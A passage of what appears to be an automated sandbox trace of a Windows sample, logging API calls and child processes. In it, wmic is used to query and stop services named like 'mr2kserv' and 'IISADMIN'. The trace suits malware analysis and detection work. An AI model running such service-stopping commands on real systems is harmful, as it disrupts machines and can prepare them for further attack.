Attributes=0xa580), (Luid.LowPart=0x0, Luid.HighPart=4418128, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=4391256, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=151060488, Attributes=0x1000a59d), (Luid.LowPart=0x0, Luid.HighPart=4444000, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0251.928] free (_Block=0x43cf80) [0251.928] CloseHandle (hObject=0x298) returned 1 [0251.928] lstrlenW (lpString="GET") returned 3 [0251.928] lstrlenW (lpString="call") returned 4 [0251.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0251.928] lstrlenW (lpString="LIST") returned 4 [0251.928] lstrlenW (lpString="call") returned 4 [0251.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0251.928] lstrlenW (lpString="SET") returned 3 [0251.928] lstrlenW (lpString="call") returned 4 [0251.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0251.928] lstrlenW (lpString="CALL") returned 4 [0251.928] lstrlenW (lpString="call") returned 4 [0251.928] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0251.929] ??0CHString@@QEAA@XZ () returned 0x24f990 [0251.929] GetCurrentThreadId () returned 0xb18 [0251.929] malloc (_Size=0x18) returned 0x43cca0 [0251.929] malloc (_Size=0x18) returned 0x43ccc0 [0251.929] malloc (_Size=0x18) returned 0x43cce0 [0251.929] malloc (_Size=0x18) returned 0x43cd00 [0251.929] malloc (_Size=0x18) returned 0x43d550 [0251.929] SysStringLen (param_1="\\\\") returned 0x2 [0251.929] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0251.929] malloc (_Size=0x18) returned 0x43d570 [0251.929] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0251.929] SysStringLen (param_1="\\") returned 0x1 [0251.929] malloc (_Size=0x18) returned 0x43d590 [0251.929] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0251.929] SysStringLen (param_1="root\\cimv2") returned 0xa [0251.930] free (_Block=0x43d570) [0251.930] free (_Block=0x43d550) [0251.930] free (_Block=0x43cd00) [0251.930] free (_Block=0x43cce0) [0251.930] free (_Block=0x43ccc0) [0251.930] free (_Block=0x43cca0) [0251.930] malloc (_Size=0x18) returned 0x43cca0 [0251.930] malloc (_Size=0x18) returned 0x43ccc0 [0251.930] malloc (_Size=0x18) returned 0x43cce0 [0251.930] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1d51390, strNetworkResource="\\\\XDUWTFONO\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffc929d0 | out: ppNamespace=0xffc929d0*=0x1d63b28) returned 0x0 [0251.936] free (_Block=0x43cce0) [0251.936] free (_Block=0x43ccc0) [0251.936] free (_Block=0x43cca0) [0251.936] CoSetProxyBlanket (pProxy=0x1d63b28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0251.937] free (_Block=0x43d590) [0251.937] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0251.937] ??0CHString@@QEAA@XZ () returned 0x24f738 [0251.937] GetCurrentThreadId () returned 0xb18 [0251.937] malloc (_Size=0x70) returned 0x43cf80 [0251.937] malloc (_Size=0x50) returned 0x43d000 [0251.937] malloc (_Size=0x50) returned 0x43d060 [0251.937] malloc (_Size=0x70) returned 0x43d0c0 [0251.937] malloc (_Size=0x70) returned 0x43d140 [0251.937] malloc (_Size=0x48) returned 0x43d1c0 [0251.937] malloc (_Size=0x18) returned 0x43cca0 [0251.937] lstrlenA (lpString="") returned 0 [0251.937] malloc (_Size=0x2) returned 0x436a50 [0251.937] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc2314c, cbMultiByte=-1, lpWideCharStr=0x436a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0251.938] free (_Block=0x436a50) [0251.938] malloc (_Size=0x70) returned 0x43d210 [0251.938] malloc (_Size=0x48) returned 0x43d290 [0251.938] malloc (_Size=0x18) returned 0x43ccc0 [0251.938] free (_Block=0x43cca0) [0251.938] IWbemServices:GetObject (in: This=0x1d63b28, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x24f768*=0x0, ppCallResult=0x0 | out: ppObject=0x24f768*=0x1d8c030, ppCallResult=0x0) returned 0x0 [0251.960] malloc (_Size=0x18) returned 0x43cca0 [0251.960] IWbemClassObject:GetMethod (in: This=0x1d8c030, wszName="stopservice", lFlags=0, ppInSignature=0x24f760, ppOutSignature=0x24f778 | out: ppInSignature=0x24f760*=0x0, ppOutSignature=0x24f778*=0x1d8c530) returned 0x0 [0251.960] free (_Block=0x43cca0) [0251.960] IUnknown:Release (This=0x1d8c530) returned 0x0 [0251.960] IUnknown:Release (This=0x1d8c030) returned 0x0 [0251.960] ??0CHString@@QEAA@XZ () returned 0x24f580 [0251.960] GetCurrentThreadId () returned 0xb18 [0251.960] malloc (_Size=0x18) returned 0x43cca0 [0251.961] lstrlenA (lpString="") returned 0 [0251.961] malloc (_Size=0x2) returned 0x436a50 [0251.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc2314c, cbMultiByte=-1, lpWideCharStr=0x436a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0251.961] free (_Block=0x436a50) [0251.961] malloc (_Size=0x18) returned 0x43cce0 [0251.961] lstrlenA (lpString="") returned 0 [0251.961] malloc (_Size=0x2) returned 0x436a50 [0251.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc2314c, cbMultiByte=-1, lpWideCharStr=0x436a50, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0251.961] free (_Block=0x436a50) [0251.961] malloc (_Size=0x18) returned 0x43cd00 [0251.961] free (_Block=0x43cce0) [0251.961] malloc (_Size=0x18) returned 0x43cce0 [0251.961] lstrlenA (lpString="SELECT * FROM ") returned 14 [0251.962] malloc (_Size=0x1e) returned 0x43d2e0 [0251.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc24a40, cbMultiByte=-1, lpWideCharStr=0x43d2e0, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0251.962] free (_Block=0x43d2e0) [0251.962] malloc (_Size=0x18) returned 0x43d550 [0251.962] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0251.962] SysStringLen (param_1="Win32_Service") returned 0xd [0251.962] free (_Block=0x43cce0) [0251.962] malloc (_Size=0x18) returned 0x43cce0 [0251.962] malloc (_Size=0x18) returned 0x43d570 [0251.962] lstrlenA (lpString=" WHERE ") returned 7 [0251.962] malloc (_Size=0x10) returned 0x43d590 [0251.963] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc23e20, cbMultiByte=-1, lpWideCharStr=0x43d590, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0251.963] free (_Block=0x43d590) [0251.963] malloc (_Size=0x18) returned 0x43d590 [0251.963] SysStringLen (param_1=" WHERE ") returned 0x7 [0251.963] SysStringLen (param_1="name like '%%mr2kserv%%'") returned 0x18 [0251.963] malloc (_Size=0x18) returned 0x43d5b0 [0251.963] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0251.963] SysStringLen (param_1=" WHERE name like '%%mr2kserv%%'") returned 0x1f [0251.963] free (_Block=0x43d550) [0251.963] free (_Block=0x43d590) [0251.963] free (_Block=0x43d570) [0251.963] free (_Block=0x43cce0) [0251.963] malloc (_Size=0x18) returned 0x43cce0 [0251.964] IWbemServices:ExecQuery (in: This=0x1d63b28, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%mr2kserv%%'", lFlags=48, pCtx=0x0, ppEnum=0x24f568 | out: ppEnum=0x24f568*=0x1d63c28) returned 0x0 [0251.971] free (_Block=0x43cce0) [0251.971] CoSetProxyBlanket (pProxy=0x1d63c28, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0251.976] IEnumWbemClassObject:Next (in: This=0x1d63c28, lTimeout=-1, uCount=0x1, apObjects=0x24f570, puReturned=0x24f6f8 | out: apObjects=0x24f570*=0x0, puReturned=0x24f6f8*=0x0) returned 0x1 [0253.157] IUnknown:Release (This=0x1d63c28) returned 0x0 [0253.159] free (_Block=0x43d5b0) [0253.159] free (_Block=0x43cd00) [0253.159] free (_Block=0x43cca0) [0253.159] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0253.159] free (_Block=0x43ccc0) [0253.159] free (_Block=0x43d1c0) [0253.159] free (_Block=0x43d140) [0253.159] free (_Block=0x43d0c0) [0253.159] free (_Block=0x43d060) [0253.159] free (_Block=0x43d000) [0253.159] free (_Block=0x43d290) [0253.159] free (_Block=0x43d210) [0253.159] free (_Block=0x43cf80) [0253.159] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0253.160] GetCurrentThreadId () returned 0xb18 [0253.160] ??0CHString@@QEAA@PEBG@Z () returned 0x24fa88 [0253.160] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x24fa88 [0253.160] malloc (_Size=0x800) returned 0x43dd20 [0253.160] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x43dd20, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0253.160] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0253.160] malloc (_Size=0x1c) returned 0x43cf80 [0253.160] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x43cf80, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0253.160] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 27 [0253.160] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0253.160] free (_Block=0x43cf80) [0253.161] free (_Block=0x43dd20) [0253.161] ??1CHString@@QEAA@XZ () returned 0x639e4701 [0253.161] WbemLocator:IUnknown:Release (This=0x1d63b28) returned 0x0 [0253.161] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0253.161] _kbhit () returned 0x0 [0253.162] free (_Block=0x43cf60) [0253.162] free (_Block=0x43cb00) [0253.162] free (_Block=0x43cae0) [0253.163] free (_Block=0x43cac0) [0253.163] free (_Block=0x43caa0) [0253.163] free (_Block=0x43cdc0) [0253.163] free (_Block=0x437140) [0253.163] free (_Block=0x43cf00) [0253.163] free (_Block=0x438680) [0253.163] free (_Block=0x43cba0) [0253.163] free (_Block=0x43cbc0) [0253.163] free (_Block=0x436ea0) [0253.163] free (_Block=0x43d4d0) [0253.163] free (_Block=0x43cbe0) [0253.163] free (_Block=0x43cc40) [0253.163] free (_Block=0x43d450) [0253.163] free (_Block=0x43d3d0) [0253.163] free (_Block=0x43cc20) [0253.163] free (_Block=0x43cc00) [0253.163] free (_Block=0x43cc60) [0253.163] free (_Block=0x43d370) [0253.163] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0253.163] free (_Block=0x43ce60) [0253.163] free (_Block=0x43cb40) [0253.163] free (_Block=0x43cf30) [0253.163] free (_Block=0x43cb80) [0253.163] free (_Block=0x438600) [0253.164] free (_Block=0x43cb60) [0253.164] free (_Block=0x43cb20) [0253.164] free (_Block=0x437f70) [0253.164] free (_Block=0x436980) [0253.164] free (_Block=0x4369d0) [0253.164] free (_Block=0x43cc80) [0253.164] free (_Block=0x436ac0) [0253.164] free (_Block=0x436e80) [0253.164] free (_Block=0x438040) [0253.164] free (_Block=0x436e60) [0253.164] free (_Block=0x438000) [0253.164] free (_Block=0x436e00) [0253.164] free (_Block=0x436e20) [0253.164] free (_Block=0x436ce0) [0253.164] free (_Block=0x436d00) [0253.164] free (_Block=0x436c80) [0253.164] free (_Block=0x436ca0) [0253.164] free (_Block=0x436d40) [0253.164] free (_Block=0x436d60) [0253.164] free (_Block=0x436da0) [0253.164] free (_Block=0x436dc0) [0253.165] free (_Block=0x436bc0) [0253.165] free (_Block=0x436be0) [0253.165] free (_Block=0x436b60) [0253.165] free (_Block=0x436b80) [0253.165] free (_Block=0x436c20) [0253.165] free (_Block=0x436c40) [0253.165] free (_Block=0x436b00) [0253.165] free (_Block=0x436b20) [0253.165] free (_Block=0x436a70) [0253.165] free (_Block=0x436a20) [0253.165] free (_Block=0x43cd30) [0253.165] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x2 [0253.165] WbemLocator:IUnknown:Release (This=0x1d63a98) returned 0x0 [0253.169] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x1 [0253.169] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0253.169] WbemLocator:IUnknown:Release (This=0x1d51390) returned 0x0 [0253.169] free (_Block=0x43ca20) [0253.169] free (_Block=0x43ca40) [0253.169] free (_Block=0x438540) [0253.169] free (_Block=0x43ca60) [0253.169] free (_Block=0x43ca80) [0253.169] free (_Block=0x438580) [0253.170] free (_Block=0x43c8a0) [0253.170] free (_Block=0x43c8c0) [0253.170] free (_Block=0x4383c0) [0253.170] free (_Block=0x43c8e0) [0253.170] free (_Block=0x43c900) [0253.170] free (_Block=0x438400) [0253.170] free (_Block=0x43c820) [0253.170] free (_Block=0x43c840) [0253.170] free (_Block=0x438340) [0253.170] free (_Block=0x43c860) [0253.170] free (_Block=0x43c880) [0253.170] free (_Block=0x438380) [0253.170] free (_Block=0x43c9a0) [0253.171] free (_Block=0x43c9c0) [0253.171] free (_Block=0x4384c0) [0253.171] free (_Block=0x43c9e0) [0253.171] free (_Block=0x43ca00) [0253.171] free (_Block=0x438500) [0253.171] free (_Block=0x43c7a0) [0253.171] free (_Block=0x43c7c0) [0253.171] free (_Block=0x4382c0) [0253.171] free (_Block=0x43c7e0) [0253.171] free (_Block=0x43c800) [0253.171] free (_Block=0x438300) [0253.171] free (_Block=0x43c920) [0253.171] free (_Block=0x43c940) [0253.171] free (_Block=0x438440) [0253.172] free (_Block=0x43c960) [0253.172] free (_Block=0x43c980) [0253.172] free (_Block=0x438480) [0253.172] free (_Block=0x43c6e0) [0253.172] free (_Block=0x43c700) [0253.172] free (_Block=0x438200) [0253.172] free (_Block=0x43c5a0) [0253.172] free (_Block=0x43c5c0) [0253.172] free (_Block=0x4380c0) [0253.172] free (_Block=0x43c560) [0253.172] free (_Block=0x43c580) [0253.172] free (_Block=0x438080) [0253.172] free (_Block=0x43c620) [0253.172] free (_Block=0x43c640) [0253.172] free (_Block=0x438140) [0253.172] free (_Block=0x43c720) [0253.172] free (_Block=0x43c740) [0253.172] free (_Block=0x438240) [0253.172] free (_Block=0x43c5e0) [0253.173] free (_Block=0x43c600) [0253.173] free (_Block=0x438100) [0253.173] free (_Block=0x43c660) [0253.173] free (_Block=0x43c680) [0253.173] free (_Block=0x438180) [0253.173] free (_Block=0x43c6a0) [0253.173] free (_Block=0x43c6c0) [0253.173] free (_Block=0x4381c0) [0253.173] free (_Block=0x43c760) [0253.173] free (_Block=0x43c780) [0253.173] free (_Block=0x438280) [0253.173] CoUninitialize () [0253.265] exit (_Code=0) [0253.265] free (_Block=0x436ef0) [0253.265] free (_Block=0x437f30) [0253.265] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0253.265] free (_Block=0x436fe0) [0253.265] free (_Block=0x436ae0) [0253.265] free (_Block=0x437ef0) [0253.265] free (_Block=0x437eb0) [0253.265] free (_Block=0x437e60) [0253.265] free (_Block=0x437e20) [0253.265] free (_Block=0x435ac0) [0253.265] free (_Block=0x437da0) [0253.266] free (_Block=0x435a80) [0253.266] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0253.266] free (_Block=0x4385c0) Thread: id = 203 os_tid = 0xbd0 Thread: id = 204 os_tid = 0xb74 Thread: id = 205 os_tid = 0x6cc Thread: id = 206 os_tid = 0x710 Thread: id = 207 os_tid = 0x9c0 Process: id = "25" image_name = "wmiadap.exe" filename = "c:\\windows\\system32\\wbem\\wmiadap.exe" page_root = "0x6f876000" os_pid = "0x284" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x370" cmd_line = "wmiadap.exe /F /T /R" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 208 os_tid = 0xa94 Thread: id = 209 os_tid = 0x9d0 Thread: id = 210 os_tid = 0xa00 Thread: id = 211 os_tid = 0xb04 Thread: id = 212 os_tid = 0xb28 Thread: id = 213 os_tid = 0x150 Process: id = "26" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x138c5000" os_pid = "0x4e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x860" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%IISADMIN%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 215 os_tid = 0xabc [0253.675] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xafe30 | out: lpSystemTimeAsFileTime=0xafe30*(dwLowDateTime=0xac8e6e90, dwHighDateTime=0x1d61d49)) [0253.675] GetCurrentProcessId () returned 0x4e8 [0253.675] GetCurrentThreadId () returned 0xabc [0253.675] GetTickCount () returned 0x116903f [0253.675] QueryPerformanceCounter (in: lpPerformanceCount=0xafe38 | out: lpPerformanceCount=0xafe38*=37384855332) returned 1 [0253.680] GetModuleHandleW (lpModuleName=0x0) returned 0xff840000 [0253.680] __set_app_type (_Type=0x1) [0253.680] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff88ced0) returned 0x0 [0253.681] __wgetmainargs (in: _Argc=0xff8b2380, _Argv=0xff8b2390, _Env=0xff8b2388, _DoWildCard=0, _StartInfo=0xff8b239c | out: _Argc=0xff8b2380, _Argv=0xff8b2390, _Env=0xff8b2388) returned 0 [0253.681] ??0CHString@@QEAA@XZ () returned 0xff8b2ab0 [0253.681] malloc (_Size=0x30) returned 0x305a80 [0253.681] malloc (_Size=0x70) returned 0x307da0 [0253.682] malloc (_Size=0x50) returned 0x305ac0 [0253.682] malloc (_Size=0x30) returned 0x307e20 [0253.682] malloc (_Size=0x48) returned 0x307e60 [0253.682] malloc (_Size=0x30) returned 0x307eb0 [0253.682] malloc (_Size=0x30) returned 0x307ef0 [0253.682] ??0CHString@@QEAA@XZ () returned 0xff8b2f58 [0253.682] malloc (_Size=0x30) returned 0x307f30 [0253.682] ?Empty@CHString@@QEAAXXZ () returned 0x7fef926482c [0253.682] SetConsoleCtrlHandler (HandlerRoutine=0xff885724, Add=1) returned 1 [0253.682] _onexit (_Func=0xff89f378) returned 0xff89f378 [0253.682] _onexit (_Func=0xff89f490) returned 0xff89f490 [0253.682] _onexit (_Func=0xff89f4d0) returned 0xff89f4d0 [0253.683] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0253.683] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0253.688] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0253.755] CoCreateInstance (in: rclsid=0xff8473a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff847370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff8b2940 | out: ppv=0xff8b2940*=0x1c81390) returned 0x0 [0253.777] GetCurrentProcess () returned 0xffffffffffffffff [0253.777] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0xafc00 | out: TokenHandle=0xafc00*=0xf4) returned 1 [0253.777] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafbf8 | out: TokenInformation=0x0, ReturnLength=0xafbf8) returned 0 [0253.777] malloc (_Size=0x118) returned 0x306980 [0253.777] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x306980, TokenInformationLength=0x118, ReturnLength=0xafbf8 | out: TokenInformation=0x306980, ReturnLength=0xafbf8) returned 1 [0253.777] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x306980*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1467824981, Attributes=0xa457), (Luid.LowPart=0x0, Luid.HighPart=3178352, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0253.777] free (_Block=0x306980) [0253.777] CloseHandle (hObject=0xf4) returned 1 [0253.777] malloc (_Size=0x40) returned 0x307f70 [0253.777] malloc (_Size=0x40) returned 0x306980 [0253.777] malloc (_Size=0x40) returned 0x3069d0 [0253.778] malloc (_Size=0x20a) returned 0x306a20 [0253.778] GetSystemDirectoryW (in: lpBuffer=0x306a20, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0253.778] free (_Block=0x306a20) [0253.778] malloc (_Size=0x18) returned 0x306a20 [0253.778] malloc (_Size=0x18) returned 0x306a40 [0253.778] malloc (_Size=0x18) returned 0x306a60 [0253.778] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0253.778] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0253.778] free (_Block=0x306a20) [0253.778] free (_Block=0x306a40) [0253.778] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0253.779] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0253.779] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0253.780] FreeLibrary (hLibModule=0x77940000) returned 1 [0253.780] free (_Block=0x306a60) [0253.780] _vsnwprintf (in: _Buffer=0x3069d0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xaf828 | out: _Buffer="ms_409") returned 6 [0253.780] malloc (_Size=0x20) returned 0x306a20 [0253.780] GetComputerNameW (in: lpBuffer=0x306a20, nSize=0xafc00 | out: lpBuffer="XDUWTFONO", nSize=0xafc00) returned 1 [0253.780] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.780] malloc (_Size=0x14) returned 0x306a50 [0253.780] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.781] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xafbf8 | out: lpNameBuffer=0x0, nSize=0xafbf8) returned 0x7fffffde000 [0253.782] GetLastError () returned 0xea [0253.782] malloc (_Size=0x40) returned 0x306a70 [0253.782] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x306a70, nSize=0xafbf8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xafbf8) returned 0x1 [0253.782] lstrlenW (lpString="") returned 0 [0253.782] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0253.785] lstrlenW (lpString=".") returned 1 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0253.785] lstrlenW (lpString="LOCALHOST") returned 9 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0253.785] free (_Block=0x306a50) [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] malloc (_Size=0x14) returned 0x306a50 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] malloc (_Size=0x14) returned 0x306ac0 [0253.785] lstrlenW (lpString="XDUWTFONO") returned 9 [0253.785] malloc (_Size=0x8) returned 0x306ae0 [0253.785] malloc (_Size=0x18) returned 0x306b00 [0253.786] malloc (_Size=0x30) returned 0x306b20 [0253.786] malloc (_Size=0x18) returned 0x306b60 [0253.786] SysStringLen 